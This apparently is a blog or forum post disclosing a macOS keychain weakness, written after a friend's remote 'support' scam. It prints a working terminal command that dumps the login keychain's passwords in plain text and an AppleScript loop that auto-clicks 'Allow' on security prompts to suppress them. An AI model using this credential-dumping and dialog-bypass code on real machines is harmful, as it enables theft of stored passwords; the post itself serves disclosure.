This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.

There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing, this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.

The method consists of opening up terminal, and cutting and pasting the following code:

security dump-keychain -d login.keychain > keychain.txt

You can circumvent all system dialogs by scripting that terminal command and adding the following:

tell application "System Events"

repeat while exists (processes where name is "SecurityAgent")

tell process "SecurityAgent"

click button "Allow" of group 1 of window 1

end tell

delay 0.2

end repeat

end tell

Any unauthorized user, wether its through a remote session like with my friend, or someone you’ve let borrow your computer for only a few seconds, can gain access to every username and password you’ve ever stored in Keychain, and inherently, iCloud.

Apple prides itself on security, but apparently this has been a known method for at least the two years since the article I used to confirm the method had been posted. This is a major security flaw that at no step requires the user to confirm your password. The Keychain dialogue requires your password when you request to “show password” for a particular entry.

Shouldn’t a terminal command require the same level of security?

Edit: Since this blew up overnight, I want to address a few comments and concerns that continue to come up: